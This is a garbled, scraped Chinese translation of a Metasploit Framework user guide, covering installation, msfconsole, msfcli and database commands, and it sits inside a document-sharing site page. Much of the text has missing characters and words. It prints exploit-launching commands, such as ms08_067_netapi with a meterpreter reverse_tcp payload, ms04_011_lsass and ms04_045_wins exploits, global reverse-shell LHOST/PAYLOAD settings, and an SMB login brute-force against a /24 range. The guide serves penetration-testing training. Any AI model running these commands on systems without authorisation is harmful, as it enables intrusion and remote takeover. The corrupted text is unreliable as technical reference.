版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领
文档简介
目的人 组 文档默认和约 帮 开源承 预备知识和要 系统需 最低硬件配 支持的平 关闭杀毒软 关闭管理员使 安 在windows上的安 在linux上的安 建 分叉出Msf的版本 更 测试环 设 三、综述 基本 脆弱性 渗透 载荷 MSF组成 函数 接 模 工 插 混合类型 数据 全局数据模块数据保存的数据数据效 数据变 基本工作流程 选择一个模 配置模 设置选 选择目 选择载 运行模 MSF控制台的管理 数据库 数据库命 数据库 安装PostgreSQLRuby 连接一个数据 工作空间 改变工作空 删除工作空 主机 查看主机列 增加一个主 删除一个主 与一个主机连 将主机数据导出到CSV文件 导入扫描数 主机表的 查看 输出主机数 模块 搜索一个模 渗透模块 载入一个渗透模 显示一个渗透模块的操 显示一个渗透模块的高级操 运行一个渗透模 运行一次强行设定渗透的最 辅助模块 显示辅助模 后渗透模块 载荷 显示所有的载 显示一个载荷的操 目标 显示目 本指南的目的人群是那些用MetasploitFramework来进行渗透测试和安全评估的IT和安全专表明:按钮,UI比如:> 比如:“输入下面的文字:od 比如“想要信息,请看MetasploitProInstallationGuide你也可以通过Metasploit社区或者Metasploit工程帮助页,查看有关于MetasploitFramework的帮助。MetasploitFramework是一个开源社区和Rapid7Rapid7秉承开源开发的精终能够对于那些可能存在于任何环境下的关键有更好的理解并且减少这些带来的MetasploitFrameworkPostgreSQL,Java,Ruby等,商业版本也亦然。接下来的部分会阐述有关安装MetasploitFramework90MLinux2GHz+2GB500M10/100MbpsWindowsXP,2003,Vista,2008ServerWindowsLinux5.x,6.x,-x86x86_64UbuntuLinux8.04,10.04–x86和-x86_64杀毒软件会将开源的MetasploitFramework视为软件因此可能导致MetasploitFramework在安装和运行阶段出现问题。MetasploitFramework工作所依赖的部分与杀会打断安装进程并警告你安装MetasploitFramework会有安全方面的并可能会影响系统MetasploitFrameworkMetasploitFramework之前关闭掉所关闭本地的,包括WindowsFirewall,与渗透和载荷有直接的接触和相互作用。如果你在之后安装MetasploitFramework,可能会将MetasploitFramework视为软件并且的进程。者执意在一个之后进行操作,你应该从网络途径之外MetasploitFramework。为了安装MetasploitFramework,你必须要有所用系统的管理员只有过的用户才可以使用MetasploitFramework。为了行动而使用软件是的,而且会招致法律的你应该在被允许测试的机器上或者你自己的机器上运行Metasploit如果想要得 的安装文件,请访 安装文件为用户提供一个自包含1的环境来运行和更新MetasploitFrameworkPostgreSQL,JavaRuby,在安装的进程中已经为你安装和MetasploitFramework所在的硬盘驱动器或者外部磁盘上的目标文件夹的网络服务器上,用做SSL,nginx和Mongrel的的端码1以是任何的名字而不需要是一个有完全资格的。5-101、 /download/Windows的安装文件2、找到好的安装文件并双击安装程序的图标。此时可能会出现安全警告。在安全警告(Run(NextWindows710分钟时间。(Next”5MetasploitFramework的文件夹。在接下来的界面中,你可以选择安装在默认的文件夹下面或者单击文件夹图标来选择一个不同的 (Next7、输入SSL端validity”(next(Next安装框显示着安装的进度。(Finishlinux,1http://w /download/Linux32bit或者64bit安装包。保存安装,64位的系统:3264325,如果提示输入,请输入你的sudo。8,选择一个安装文件夹然后点击Forward11,输入用来生成SSL的服务器名称12,输入希望SSL保持有效的天数。点击Forward继续15,ReadytoInstallForwardMetasploitFrameworkMetasploitFramework使用 来框架的版本库 为了能够帮助完善MetasploitFramework,你必须安装 叉2出Metasploit的版本库,并在本地创建一个框架版本的备份。 MetasploitFramework的代码 账号和SSH密钥。关于如何建 的详情请参 Msf在你安装好、建立好SSH密钥并且创建一个用户账号之后,你将会须要分叉处MetasploitFramework的版本库。当你“分叉”出一个版本库,也就意味着你在使用其当做MetasploitFramework的版本库的是 关于如何分叉处版本库的参 在你分叉好MetasploitFramework的版本库之后,你需要创建一个文件夹来一个本地MetasploitFrameworkGitMetasploitFrameworkGitBash并输入下面令:git 2fork如果需要将版本库更新成的代码,打开GitBash并输入下面令git台运行着MetasploitFramework和防御脆弱的测试目标系统的机器。下面的部分会阐述目标你首先必须要做的事情之一就是配置一个目标网络。Rapid7提供了防御脆弱的虚拟机,如果你要进试,可以在本地机器上安装。 AMP主要是网络的。其使用默认的root:vmware。你可以通过虚拟机的IP加上:80来得到所有应用的使用权。想建议一个虚拟机,你可以在下面的上得到免费的VMWareyer: ( (Ultima AMP和Metasploitable虚拟机,请如下:http:// 你必须在本地机器上和安装防御脆弱的虚拟机作为一个从机系统虚拟机大约有600MB,从光纤网络连接会花费大约10分钟。当虚拟机完成之后,通过VMwareyer运行这个系统。另外,你也可以使用试和执行渗透测试的代码的功能。MetasploitFramework还包含一组实用的工具,可以用来测试安全,网络查点,执行和逃避检测。Metasploit内核中是一些经常使用的工具的集合,这些工具可以提供完整的渗透测试和渗透开发的环境。基本脆弱性(Vulnerability)是一个应用或者系统中的安全的缺陷和弱点,可能被者利用来渗透渗透是一个利用特定提供给者目标机器进入权的程序。一个典型渗透程序一般会携带着载荷,并将载荷传送到目标系统。载荷是我们期望目标系统在被渗透之后去执行的实际的代码因此有很多种载荷:反弹式s 和binds 。两者的主要区别是s 如何让你连接到被的系统上。反弹式s 在目标主机和主机之间建立网络连接并提供命令行。而binds 则在目标主机上将命令行s 绑定到一个打开的端口。者可以通过连接到bind 来进入被的系统。4MSF(libraries(interace(module,工具(plugins3compromise4此处有疑问本指南中说连接到binds 渗透测试指南中说whereasabinds isapayloadthat“binds”acommandprompttoalisteningportonthetargetmachine,whichtheattackercanthenMetasploitFramework的是一组函数库。这些函数库包含一组类和工具,用来管理各种MetasploitFramework的部分,比如模块,插件和端口。RexRubyMetasploitFramework的最基本的组成部分。Rexsubystem,msfcoreexploits,sessionplugins与不同的端口之间能够进行在MetasploitFramework中有一些接口可以用来和使用MetasploitFramework的功能。这些接口包含一个控制台(console,命令行(commandline)和用户图形界面。控制台接口,也称msfconsole,提供了一个MetasploitFramework几乎所有的特性和操Linuxmsf终端,打开系统终端并输入msfconsolewindows系统,选择开始->所有程序->Metasploit->Framework->FrameworkConsole。metasploitASCII的艺术徽标,并输msf>prompt。5MSFconsole使用下面令与控制台进行交互式工作输入help会列出在当前模式下有效令。当你在主模式下时,系统显示可以使用的全局命令。而当你在模块模式下时,系统显示模块中可以使用令和操作的帮助。info<modulename>MSFgui是一个基于javaGUI自己独特的一些优势。另外,msfgui允许连接到一个主机上的msfrpcd的进程。linuxmsfguimsfguiWindows系统,选择开始->所有程序->metasploit->Framework->FrameworkMSFGUI。当你运行msfgui的时候,程序会尝试连接到另外一个主机上的一个的msfrpcd进程。msfgui运行界面如下图所示。MSFGUI使用下面令和指南来与msfgui进行交互式工作msfrpcd进程:./msfrpcd–S–U<username>-p<password>-p<listeningport>.当进程已经打开之后,通过msfgui连接到msfrpcd进程。使用msfrpcd主机的信息来配置msfgui的msfrpcd的连接。msfcli来运行模块,你必须使用下面的格式<modulename><optionvalue>mode].OPTION=VALUE格式。msfcliexploit/windows/smb/ms08_067_netapiRHOST=LHOST=PAYLOAD=windows/meterpreter/reverse_tcpLHOST=eMSFcli使用下面令,模式和指南与msfcli进行交互式工作:输入A:查看模块的高级命令输入I:查看检测系统的规避输入P:查看模块可使用的载荷输入T:查看目标系统输入AC:查看辅助模块的可用的功能输入C:进行一次检测输入Eo在字符串最后附加一个p:查看当前模块的载荷输入msfcli–h查看所有可用令Armitage是一个形象化地精简了MetasploitFramework功能的图形化用户接口,比如主机发现,服务器端和客户端的渗透,pivoting和权限提升。MetasploitArmitage自动包MetasploitFramework的安装程序中。关于如何使用Armitage的详情,请:/manual你可以在下面的FTPfuzzers:<installation下面是在MetasploitFramework中的可用的模块的类型:NOPgeneratorPayloadencoder工具是MetasploitFramework能的直接接口最常用的功能是msfpayload和msfencode使用MSFpayload工具,用户能够很方便地生成 数据数据系统是MetasploitFramework的组成部分。数据是一个确定值的表,其作用是配置MetasploitFramework的组成部件的行为表现数据使得接口能够配置其设置,载荷能够掩盖操作码,也能使渗透能够定义其参数。数据也使得MetasploitFramework能够在内部模块之间传递选项。数据分为两类:全局数据模块数据全局数据的内容是应用于全部模块的。比如,如果在全局数据中你定义了msf>setgNoentriesindata6mixins据。你应该经常保存数据来保持其内容。你可以使用set和unset命令来从控制台编辑模块的数据如果你用一个参数来调用set,例如,当已经设置了RHOST和PHOST操作,它们的值会在已被载入的模块实例的数据中。如果MetasploitFramework没有找到模块数据中的选项或者变量,那么MetasploitFramework会向全局数据请求选项或者变量。Moduleoptions(exploit/windows/smb/ms08_067_netapi):NameCurrentSettingRequiredDescriptionRHOSTyesThetargetRPORT445yesSettheSMBserviceSMBPIPEBROWSERyesThepipenametouse(BROWSER,SRVSVC)Exploittarget:Id0Automaticmsfexploit(ms08_067_netapi)>setRHOST56RHOST=>56msfexploit(ms08_067_netapi)如果你决定使用另一个模块,比如windows/smb/smb_relay,RHOST你可以使用save命令来使全局数据和模块数据通不到硬盘上。这能让你方便的保存经常会使用到的变量等信息。这样即可将已经保存的环境到HOME/.msf3/config下,并且在启动MetasploitFramework接载入。 中可以接下来的例子解释LPORT,LHOST和PAYLOAD全局数据如何被用于对一组Windows目标进行。如果这个数据被设定好了而且一个Linux的渗透正在被使用,那么模块的数据会将这些默认设置覆盖掉。f>setgLHOST0LHOST=>0msf>setgLPORT4445LPORT=>4445msf>setgPAYLOADwindows/s/reverse_tcpPAYLOAD=>windows/s/reverse_tcpmsf>usewindows/smb/ms04_011_lsassmsfexploit(ms04_011_lsass)>showoptionsModuleoptions:PayloadNameCurrentSettingRequiredEXITFUNCthreadyesExittechnique:seh,thread,processLHOST0yesThelocaladdressLPORT4445yesThelocal01置的子下:$home/.msf3/logs。的安装下的模块中载入模块。另外如果$HOME/.msf3/modules下面的部分是一个MetasploitFrameworkNOPgenerator方面的内容。选择一个模块最简答的方法就是去查看一下MetasploitFramework中可以使用的所有的模块列表在控制台中输入showall命令来查看所有渗透模块辅助模块后渗透模块、NOP产生器和载荷的列表。msf>showmsf>useauxiliary/scanner/smb/smb_loginmsf(smb_login)>msf(smb_login)>showModuleoptionsNameCurrentSettingRequiredBLANKPASSWORDStruenoTryblankpasswordsforallusersBRUTE_SPEED5yesHowfasttobrute一般来说,你可能想设置的最普遍的选项是RHOSTS,RPORT,LHOST,LPORT,THREADS,TIMEOUT,WORKSPACE和GWHOST。setunset命令来设置选项。setunset命令作用于当前模块的环境中;当你离开了当前模块的环境,set和unset的值就会丢失。msf(smb_login)>showModuleoptions(auxiliary/scanner/smb/smb_login)NameCurrentSettingRequiredDescriptionBLANKPASSWORDStruenoTryblankpasswordsforallusersBRUTE_SPEED5yesHowfasttobrutemsf(smb_login)>setbrute_speed3brute_speed=>3当你运行一个渗透模块之前,你需要查实一下可以进行特定的有的目标机器。使用下面令查看潜在的有的目标msf>usewindows/wins/ms04_045_winsmsf(ms04_045_wins)>showtargetsExploittargets:Id==0Windows2000msf(ms04_045_wins)>settarget0TARGET=>0要使用set命令来载入到渗透中你的载荷。下面的例子演示了如何设置载荷msfexploit(ms04_045_wins)>showmsfexploit(ms04_045_wins)>setpayload msfexploit(ms04_045_wins)>[*]MSF渗透模后模MSF使用ConsoleLogging选项来msf控制台输入和输出的信息到一个日志中msf>setgConsoleLoggingyConsoleloggingisnowenabled.msf>setgLogLevel3LogLevel=>3使用SessionLogging选项来msf控制台中一个会话的输入输出信息到一个日志文件中msf>setgSessionLoggingSessionloggingwillbeenabledforfutureMetasploitFramework能够为PostgreSQL提供数据库支持。数据库可以保存各种信息,比如主机数据,证明和渗透的结果。任何在MetasploitFramework中使用的数据都保存第一次运行MSF控制台的时候,MetasploitFramework会自动为你创建一个新的数据库。之db_connect–y[path/to/database.yml]db_export–f<format>-a下面的表格列出了MetasploitFramework表(address,地6Mnaeos_namos_florsaescorkspce,vulnscomments保存一个工作空间、主机或者服务的信息。NotesNmap扫描typedata。Notesnote。列出经过扫描确定了的目标主机上的服务。表中包含着下面几列:$geminstallpg提示:当你重新启动一个端,MetasploitFramework会重新连接到数据库。你可以在下面的文件中找到MetasploitFramework使用的数据库的设置:<msfmsf>db_connect如果你是Linux用户,使用下面令msf>db_connect-ydb_connect命令之后,你应该证实一下你是否成功连接到了数据库的实例。如果你已经成功连接到了数据库,msf控制台会返回一个可用主机的列表。msf>hostsaddresssmacnameos_nameos_flavoros_sppurposeinfo=======================================================HR,IT和会计部门都各自需要自己独立的工作空间。msf>workspace-aHRmsf>workspace-aITmsf>workspace-aACCmsf>msf>msf>workspaceHR[*]Workspace:HR使用workspace命令和-dmsf>msf>workspace-dACC[*]Workspace:ACCMSF控制台执行Nmapmsf>hostsaddresssmacnameos_nameos_flavoros_sppurposeinfo=======================================================msf>hosts-a[*]Time:2012-02-0105:05:05UTCHost:addresssmacnameos_nameos_flavoros_sppurposeinfo=======================================================msf>hosts-d[*]Deleted1hostsmsf>connect下面的例子输出数据库中所有主机的信息到一个叫做HRHostsmsf>hosts-o使用db_import命令来导入主机和扫描数据到数据库中。数据必须被成XML文件。默认情况下MetasploitFramework从msf3/data msf>db_import[*]Importing‘MetasploitXML’data[*]Importinghost[*]Successfullyimported你可以通过大多数可使用的扫描工具导出报告文件和扫描数据。MetasploitMetasploitFrameworkMetasploitPWDumpMetasploitXML(allMetasploitZIP(allNeXposeSimpleXMLorNeXposeRawXMLorXMLFoundstoneNetworkInventoryMBSASecScannCircleIP360(XMLv3andNetSparkerNessusNessusXML(v1andQualysAssetQualysScanBurpSessionAcunetixAppScanNmapRetinaNetSparkerAmapIPAddressmsf>hosts-uaddresssmacnameos_nameos_flavoros_sppurposeinfo=======================================================hosts命令和-cmsf>hosts-caddressmsf>hosts-u列IPmacLootMetasploitFrameworkloot命令来保存msf>hosts命令和-oCSVmsf>hosts-o[*]Wrotehoststomsf>search msf>searchtype:exploitmsf>searchauthor:hdmsf>searchapp:渗透模块出和SQL注射两种渗透。msf>show使用use命令来载入一个渗透模块msf>usewindows/wins/ms04_045_winsmsfexploit(ms04_045_wins)>msf>usewindows/wins/ms04_045_winsmsfexploit(ms04_045_wins)>showoptionsmsf>usemsfexploit(ms04_045_wins)>show使用exploit或者run命令来运行一个渗透模块msf>usewindows/wins/ms04_045_winsmsfexploit(ms04_045_wins)>run和收集DNS信息等渗透。下面的例子使用smb_login模块来在多个目标机器中测试一个:msf>usemsfauxiliary(smb_login)>setRHOSTS/24msfauxili
温馨提示
- 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
- 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
- 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
- 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
- 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
- 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
- 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
最新文档
- 煤矿内部控制管理制度
- 煤矿运销科内部考勤制度
- 甲公司内部控制制度规定
- 监测站内部审计制度
- 监理内部考勤制度
- 科室内部奖金分配制度
- 科技馆内部制度
- 管委会内部竞聘上岗制度
- 粮仓进粮内部管理制度
- 贸易型企业内部控制制度
- 海底捞培训服务制度
- 2025年金融科技产品设计与运营指南
- 2026年湖南高速铁路职业技术学院单招职业倾向性测试模拟测试卷必考题
- 2025年重庆市政府采购评审专家考试真题含答案
- 2026年辽宁轻工职业学院单招职业适应性考试题库附答案解析
- 2026年电子病历等级测评服务合同
- 模块化数据中心钢结构焊接施工方案
- 影视造型课件
- 2026年企业补贴申请技巧与政策红利获取指南
- 学术英语写作(初阶) Unit 01
- 开挖机劳务合同范本
评论
0/150
提交评论